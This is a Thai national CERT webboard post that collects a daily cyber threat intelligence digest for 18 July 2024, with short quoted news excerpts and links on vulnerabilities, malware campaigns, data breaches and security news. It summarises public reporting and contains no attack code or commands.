NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 18 July 2024

    Cyber Security News
    2
    1
    57
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย NCSA_THAICERT

      Industrial Sector

      • Defending OT Requires Agility, Proactive Controls
        "Hackers affiliated with the Chinese government have reportedly kept access to US critical infrastructure for years, several agencies warned in February.he revelation is, at least on the surface, a heel-turn for Chinese cyber behavior — moving from espionage to the potential compromise or destruction of infrastructure via operational technology (OT). This includes the programmable systems and devices connected to physical environments."
        https://www.darkreading.com/ics-ot-security/defending-ot-requires-agility-proactive-controls

      New Tooling

      • SubSnipe: Open-Source Tool For Finding Subdomains Vulnerable To Takeover
        "SubSnipe is an open-source, multi-threaded tool to help find subdomains vulnerable to takeover. It’s simpler, produces better output, and has more fingerprints than other subdomain takeover tools."
        https://www.helpnetsecurity.com/2024/07/17/subsnipe-open-source-tool-find-subdomains-vulnerable-takeover/
        https://github.com/dub-flow/subsnipe

      Vulnerabilities

      • Cisco SSM On-Prem Bug Lets Hackers Change Any User's Password
        "Cisco has fixed a maximum severity vulnerability that allows attackers to change any user's password on vulnerable Cisco Smart Software Manager On-Prem (Cisco SSM On-Prem) license servers, including administrators. The flaw also impacts SSM On-Prem installations earlier than Release 7.0, known as Cisco Smart Software Manager Satellite (SSM Satellite). As a Cisco Smart Licensing component, SSM On-Prem assists service providers and Cisco partners in managing customer accounts and product licenses."
        https://www.bleepingcomputer.com/news/security/cisco-ssm-on-prem-bug-lets-hackers-change-any-users-password/
        https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
        https://securityaffairs.com/165848/security/critical-flaw-cisco-ssm-on-prem.html
      • Atlassian Patches High-Severity Vulnerabilities In Bamboo, Confluence, Jira
        "Software vendor Atlassian on Tuesday released security-themed updates to fix several high-severity vulnerabilities in its Bamboo, Confluence and Jira products. The Australian firm called urgent attention to the Bamboo Data Center and Server updates that resolve two high-severity bugs, including one affecting the UriComponentsBuilder dependency that could allow an unauthenticated attacker to perform a server-side request forgery (SSRF) attack."
        https://www.securityweek.com/atlassian-patches-high-severity-vulnerabilities-in-bamboo-confluence-jira/
      • Chrome 126 Updates Patch High-Severity Vulnerabilities
        "Google on Tuesday announced security updates for Chrome 126 that address ten vulnerabilities, including eight high-severity bugs reported by external researchers. Despite Google’s efforts to eliminate memory safety bugs in Chrome, most of the externally reported security defects are memory issues that could potentially lead to a sandbox escape and remote code execution."
        https://www.securityweek.com/chrome-126-updates-patch-high-severity-vulnerabilities/
      • Oracle Patches 240 Vulnerabilities With July 2024 CPU
        "Oracle on Tuesday announced 386 new security patches as part of its July 2024 Critical Patch Update (CPU), including over 260 for unauthenticated, remotely exploitable vulnerabilities. SecurityWeek has identified roughly 240 unique CVEs in Oracle’s July 2024 CPU. More than two dozen security patches resolve critical-severity flaws."
        https://www.securityweek.com/oracle-patches-240-vulnerabilities-with-july-2024-cpu/
      • The Potential Impact Of The OpenSSH Vulnerabilities CVE-2024–6387 And CVE-2024-6409
        "We check the OpenSSH vulnerabilities CVE-2024–6387 and CVE-2024-6409, examining their potential real-world impact and the possibility of exploitation for CVE-2024–6387 in x64 systems."
        https://www.trendmicro.com/en_us/research/24/g/cve-2024-6387-and-cve-2024-6409.html
      • CISA Adds Three Known Exploited Vulnerabilities To Catalog
        "CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
        CVE-2024-34102 Adobe Commerce and Magento Open Source Improper Restriction of XML External Entity Reference (XXE) Vulnerability
        CVE-2024-28995 SolarWinds Serv-U Path Traversal Vulnerability
        CVE-2022-22948 VMware vCenter Server Incorrect Default File Permissions Vulnerability"
        https://www.cisa.gov/news-events/alerts/2024/07/17/cisa-adds-three-known-exploited-vulnerabilities-catalog
      • Critical Splunk Vulnerability CVE-2024-36991: Patch Now To Prevent Arbitrary File Reads
        "The SonicWall Capture Labs threat research team became aware of an arbitrary file read vulnerability affecting Splunk Enterprise installations. Identified as CVE-2024-36991 and given a CVSSv3 score of 7.5, the vulnerability is more severe than it initially appeared. Labeled as a path traversal vulnerability and categorized as CWE-35, this vulnerability allows attackers to traverse the file system to access files or directories outside the restricted directory. Splunk software uses computer-generated data to track, scan, analyze and visualize it in real-time. It is used for business and web analytics, application management, compliance, and security."
        https://blog.sonicwall.com/en-us/2024/07/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-reads/
      • Attacking Connection Tracking Frameworks As Used By Virtual Private Networks
        "VPNs (Virtual Private Networks) have become an essential privacy-enhancing technology, particularly for at-risk users like dissidents, journalists, NGOs, and others vulnerable to targeted threats. While previous research investigating VPN security has focused on cryptographic strength or traffic leakages, there remains a gap in understanding how lower-level primitives fundamental to VPN operations, like connection tracking, might undermine the security and privacy that VPNs are intended to provide."
        https://petsymposium.org/popets/2024/popets-2024-0070.php
        https://petsymposium.org/popets/2024/popets-2024-0070.pdf

      Malware

      • Critical Apache HugeGraph Vulnerability Under Attack - Patch ASAP
        "Threat actors are actively exploiting a recently disclosed critical security flaw impacting Apache HugeGraph-Server that could lead to remote code execution attacks. Tracked as CVE-2024-27348 (CVSS score: 9.8), the vulnerability impacts all versions of the software before 1.3.0. It has been described as a remote command execution flaw in the Gremlin graph traversal language API."
        https://thehackernews.com/2024/07/critical-apache-hugegraph-vulnerability.html
        https://www.securityweek.com/apache-hugegraph-vulnerability-exploited-in-wild/
      • Attacks On Israeli Orgs 'more Than Doubled' Since October 7, Cyber Researcher Says
        "Israeli organizations have seen a "dramatic increase" in cyberattacks since the October 7 terrorist attack, with some organizations experiencing a constant bombardment of intrusion attempts, according to military officials and cybersecurity researchers working in the country. Gil Messing, the chief of staff at Tel Aviv-based Check Point Software, told Recorded Future News that the cyberattacks on Israeli organizations are driven mostly by politically-motivated groups, such as hackers affiliated with Iran and Hezbollah as well as hacktivists."
        https://therecord.media/attacks-israeli-orgs-double
        https://www.darkreading.com/cloud-security/idf-has-rebuffed-3b-cloud-cyberattacks-since-oct-7-colonel-claims
        https://www.timesofisrael.com/idf-computer-chief-3-billion-cyber-attacks-against-israel-since-beginning-of-war/
      • FIN7 Reboot | Cybercrime Gang Enhances Ops With New EDR Bypasses And Automated Attacks
        "FIN7, an elusive and persistent financially motivated threat group with origins in Russia, has been active since 2012, targeting various industry sectors and causing substantial financial losses in industries such as hospitality, energy, finance, high-tech and retail."
        https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/
        https://www.bleepingcomputer.com/news/security/notorious-fin7-hackers-sell-edr-killer-to-other-threat-actors/
        https://thehackernews.com/2024/07/fin7-group-advertises-security.html
        https://therecord.media/fin7-selling-avneutralizer-tool-darknet-cybercrime
        https://www.darkreading.com/endpoint-security/security-end-run-aukill-shuts-down-windows-reliant-edr-processes
      • Private HTS Program Continuously Used In Attacks
        "AhnLab SEcurity intelligence Center (ASEC) has previously covered a case where Quasar RAT was distributed through private home trading systems (HTS) in the blog post “Quasar RAT Being Distributed by Private HTS Program“. The same threat actor has been continuously distributing malware, and attack cases have been confirmed even recently."
        https://asec.ahnlab.com/en/67969/
      • SEG Vs. SEG: How Threat Actors Are Pitting Email Security Products Against Each Other With Encoded URLs
        "Email security tools such as Secure Email Gateways (SEGs) often encode URLs that are embedded in emails. This enables the security appliance to scan the URL before the recipient visits the website. Oftentimes when SEGs detect URLs in emails that are already SEG encoded they do not scan the URLs, or the scanning shows only the security tool’s scanning page and not the actual destination. As a result, when an email already has SEG encoded URLs the recipient’s SEG often allows the email through without properly checking the embedded URLs."
        https://cofense.com/blog/seg-vs-seg-how-threat-actors-are-pitting-email-security-products-against-each-other/
        https://www.darkreading.com/cyberattacks-data-breaches/threat-actors-ramp-up-use-of-encoded-urls-to-bypass-secure-email
      • DPRK Hackers Tweak Malware To Lure MacOS Users Into Video Calls
        "Well known for targeting victims with fake job postings, North Korea state-sponsored hackers have been discovered using a new variant of their BeaverTail malware to trick macOS users into downloading a malicious version of Microtalk, a video-calling service.Details about the latest campaign were published by cybersecurity researcher Patrick Wardle, who explained in his writeup that the threat actors likely lured their victims into downloading the updated BeaverTail-infected version of Microtalk by asking them to join a job interview."
        https://www.darkreading.com/threat-intelligence/dprk-hackers-tweak-malware-to-lure-macos-users-into-video-calls
        https://objective-see.org/blog/blog_0x7A.html
        https://thehackernews.com/2024/07/north-korean-hackers-update-beavertail.html
      • Deep Dive: Exposing Stealthy New BlackSuit Ransomware
        "Five weeks ago, the KADOKAWA corporation began to experience service outages affecting multiple websites. The outages spread to other operations and were identified as a ransomware attack by the BlackSuit ransomware group. BlackSuit claimed responsibility and threatened the public release of stolen information on July 1st unless their ransom demands were met."
        https://www.deepinstinct.com/blog/deep-dive-exposing-stealthy-new-blacksuit-ransomware
      • Qilin Revisited: Diving Into The Techniques And Procedures Of The Recent Qilin Ransomware Attacks
        "Let’s revisit the Qilin ransomware group, which recently drew considerable attention due to an attack on the healthcare sector. The highest ransom demand they issued was $50 million during their assault on Synnovis, a pathology services provider. This attack had profound impacts on several key NHS hospitals in London. First identified in July 2022, Qilin has rapidly gained notoriety by launching its Ransomware-as-a-Service (RaaS) operations on underground forums as of February 2023."
        https://www.group-ib.com/blog/qilin-revisited/
        https://www.infosecurity-magazine.com/news/qilin-ransomwares-tactics-unveiled/
      • NullBulge | Threat Actor Masquerades As Hacktivist Group Rebelling Against AI
        "Between April and June 2024, the NullBulge group emerged targeting users in AI-centric application and gaming communities. The NullBulge persona has showcased creative methods of distributing malware targeting said tools and platforms. Though the group projects an image of activism claiming to be “protecting artists around the world” and claims to be motivated by a pro-art, anti-AI cause, rather than profit, other activities tied to this threat actor may indicate otherwise."
        https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
        https://www.infosecurity-magazine.com/news/nullbulge-anti-ai-hacktivist-group/
      • How To Analyze Malicious MSI Installer Files
        "Threat actors choose to use MSI installers to deliver and execute malicious payloads because these files can embed harmful executables and scripts within legitimate-looking packages, evading detection. They can abuse custom actions within MSI files to run malicious code during installation and configure the installers to download additional malware from remote servers. By masquerading as legitimate software, attackers trick users into executing these files."
        https://intezer.com/blog/incident-response/how-to-analyze-malicious-msi-installer-files/
      • Italian Government Agencies And Companies In The Target Of a Chinese APT
        "On June 24 and July 2, 2024, two targeted attacks on Italian companies and government entities were observed by a Chinese cyber actor exploiting a variant of the Rat 9002 in diskless mode. Other variants have over time been named as Rat 3102. These activities are associated with the APT17 group also known as "DeputyDog". The first campaign on June 24, 2024 used an Office document, while the second campaign contained a link. Both campaigns invited the victim to install a Skype for Business package from a link of an Italian government-like domain to convey a variant of Rat 9002."
        https://www.tgsoft.it/news/news_archivio.asp?id=1557&lang=eng
        https://thehackernews.com/2024/07/china-linked-apt17-targets-italian.html
      • The Return Of Ghost Emperor’s Demodex
        "During Sygnia’s analysis of the forensic findings extracted from the victim’s environment, the team found strong resemblance to the multi-stage tool which was described in Kaspersky’s blog from 2021. However, our investigation yielded some alterations in the infection chain and a slightly different C++ DLL variant."
        https://www.sygnia.co/blog/ghost-emperor-demodex-rootkit/
        https://therecord.media/ghostemperor-spotted-first-time-in-two-years

      Breaches/Hacks/Leaks

      • Over 400,000 Life360 User Phone Numbers Leaked Via Unsecured API
        "A threat actor has leaked a database containing the personal information of 442,519 Life360 customers collected by abusing a flaw in the login API. Known only by their 'emo' handle, they said the unsecured API endpoint used to steal the data provided an easy way to verify each impacted user's email address, name, and phone number. "When attempting to login to a life360 account on Android the login endpoint would return the first name and phone number of the user, this existed only in the API response and was not visible to the user," emo said."
        https://www.bleepingcomputer.com/news/security/over-400-000-life360-user-phone-numbers-leaked-via-unsecured-android-api/
      • Yacht Giant MarineMax Data Breach Impacts Over 123,000 People
        "MarineMax, self-described as the world's largest recreational boat and yacht retailer, is notifying over 123,000 individuals whose personal information was stolen in a March security breach claimed by the Rhysida ransomware gang. The company operates over 130 locations, including 83 dealerships and 66 marinas and storage facilities worldwide. Last year, it reported $2.39 billion in revenue and a $835.3 million gross profit."
        https://www.bleepingcomputer.com/news/security/yacht-giant-marinemax-data-breach-impacts-over-123-000-people/
        https://securityaffairs.com/165843/data-breach/marinemax-data-breach.html
      • Family Location Tracker App Life360 Breach: 443,000 Users’ Data Leaked
        "Life360, a popular family location tracker app, suffered a data breach affecting 443,000 users. Personal details, including first names and phone numbers, were leaked. Learn about the breach, potential risks, and protective measures."
        https://hackread.com/family-location-tracker-app-life360-breach-data-leak/
      • MNGI Digestive Health Data Breach Impacts 765,000 Individuals
        "MNGI Digestive Health is notifying over 765,000 individuals that their personal information was compromised in an August 2023 data breach. The incident occurred on August 20, 2023, but it took MNGI almost one year to determine that personal and protected health information was accessed."
        https://www.securityweek.com/mngi-digestive-health-data-breach-impacts-765000-individuals/
      • Hackers Claim Possession Of Four Million U Mobile User Data (Updated)
        "Recently, Bloomberg reported that local telco U Mobile may be getting bought out by fellow telco Maxis. So it’s probably not so good a time to also learn that a hacker has claimed to have breached the security system of the former, making away with personal data of about four million customers."
        https://www.lowyat.net/2024/326879/hackers-possession-u-mobile-data/

      General News

      • Overlooked Essentials: API Security Best Practices
        "In this Help Net Security, Ankita Gupta, CEO at Akto, discusses API security best practices, advocating for authentication protocols like OAuth 2.0 and OpenID Connect, strict HTTPS encryption, and the use of JWTs for stateless authentication."
        https://www.helpnetsecurity.com/2024/07/17/ankita-gupta-akto-api-security-best-practices/
      • Most GitHub Actions Workflows Are Insecure In Some Way
        "Most GitHub Actions are susceptible to exploitation; they are overly privileged or have risky dependencies, according to Legit Security."
        https://www.helpnetsecurity.com/2024/07/17/insecure-github-actions-workflows/
      • The Three Conversations Every CISO Needs To Have
        "A CISO needs to be many things. One of the most important, and possibly underestimated, is the need to be a good storyteller. It can be hard for non-technical senior managers to understand the cyber risks facing their organization. Just over a third (35%) of the smaller businesses surveyed for a recent international study said that senior managers don’t see cyberattacks as a significant risk — although a quarter admit that leaders aren’t kept up to date about threats facing the organization."
        https://blog.barracuda.com/2024/07/17/three-conversations-every-ciso-needs
        https://www.barracuda.com/reports/ciso-script
      • Ransomware Attacks Are Hitting Energy, Oil And Gas Sectors Especially Hard, Report Finds
        "Ransomware attacks are hitting energy and oil and gas sectors harder, costing utilities more in recovery time and funding as victims appear increasingly willing to pay ransom demands, according to a new report from the cybersecurity firm Sophos."
        https://cyberscoop.com/ransomware-energy-oil-gas-report/
        https://assets.sophos.com/X24WTUEQ/at/75tnw38cqsnrrv56wpwc78k/sophos-state-of-ransomware-critical-infrastructure-2024.pdf
        https://www.theregister.com/2024/07/17/ransomware_continues_to_pile_on/
      • INTERPOL Operation Strikes Major Blow Against West African Financial Crime
        "A global law enforcement operation targeting West African organized crime groups, including Black Axe, has led to hundreds of arrests, the seizure of assets worth USD 3 million, and the dismantling of multiple criminal networks around the world. Operation Jackal III, which ran from 10 April to 3 July across 21 countries on five continents, targeted online financial fraud and the West African syndicates behind it. The annual operation resulted in some 300 arrests, the identification of over 400 additional suspects, and the blocking of more than 720 bank accounts."
        https://www.interpol.int/en/News-and-Events/News/2024/INTERPOL-operation-strikes-major-blow-against-West-African-financial-crime
        https://therecord.media/interpol-operation-west-africa-cyber-fraud-300-arrested
        https://www.darkreading.com/cybersecurity-operations/west-african-crime-syndicate-taken-down-by-interpol-operation
        https://www.infosecurity-magazine.com/news/global-police-black-axe-cybercrime/
        https://cyberscoop.com/300-arrests-made-in-crackdown-of-west-african-cyber-fraud-group/
        https://www.securityweek.com/interpol-arrests-300-people-in-a-global-crackdown-on-west-african-crime-groups-across-5-continents/
      • Orgs Are Finally Making Moves To Mitigate GenAI Risks
        "Many enterprise security teams finally appear to be catching up with the runaway adoption of AI-enabled applications in their organizations, since the public release of ChatGPT 18 months ago.A new analysis by Netskope of anonymized AI app usage data from customer environments showed substantially more organizations have begun using blocking controls, data loss prevention (DLP) tools, live coaching, and other mechanisms to mitigate risk."
        https://www.darkreading.com/threat-intelligence/orgs-are-finally-making-moves-to-mitigate-genai-risks
        https://www.infosecurity-magazine.com/news/sensitive-data-sharing-genai/
      • Dark Web Shows Cybercriminals Ready For Olympics. Are You?
        "Major sporting events like the World Cup, Super Bowl, and Wimbledon attract millions, even billions, of viewers. Argentina’s shootout win over France in the final game of the Qatar 2022 World Cup reached a global audience of 1.5 billion viewers. And the Olympics, starting later this month in Paris, is the biggest of them all—with the 2020 Tokyo Olympics having attracted a worldwide audience of over 3 billion viewers."
        https://www.fortinet.com/blog/threat-research/dark-web-shows-cybercriminals-ready-for-olympics
        https://www.fortinet.com/resources/reports/fortirecon-threat-intelligence-report-summer-olympics
        https://www.infosecurity-magazine.com/news/paris-2024-olympics-face/
      • Ukraine Police Arrest Suspected Cybercriminals Accused Of Theft From Industrial Companies
        "Ukrainian law enforcement has arrested suspected cybercriminals accused of stealing from some of the country’s “leading industrial enterprises.” According to a cyber police report on Wednesday, the suspects infected employees’ computers with malicious software to gain remote access to their financial systems and changed their banking details to accounts controlled by the hackers."
        https://therecord.media/ukraine-police-arrest-suspected-cybercriminals-theft
      • The Biggest Data Breaches In 2024: 1 Billion Stolen Records And Rising
        "We’re over halfway through 2024, and already this year we have seen some of the biggest, most damaging data breaches in recent history. And just when you think that some of these hacks can’t get any worse, they do. From huge stores of customers’ personal information getting scraped, stolen and posted online, to reams of medical data covering most people in the United States getting stolen, the worst data breaches of 2024 to date have already surpassed at least 1 billion stolen records and rising. These breaches not only affect the individuals whose data was irretrievably exposed, but also embolden the criminals who profit from their malicious cyberattacks."
        https://techcrunch.com/2024/07/16/2024-in-data-breaches-1-billion-stolen-records-and-rising/

      อ้างอิง

      Electronic Transactions Development Agency(ETDA) e65b9534-fb8a-4d1b-b496-d339798f3483-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post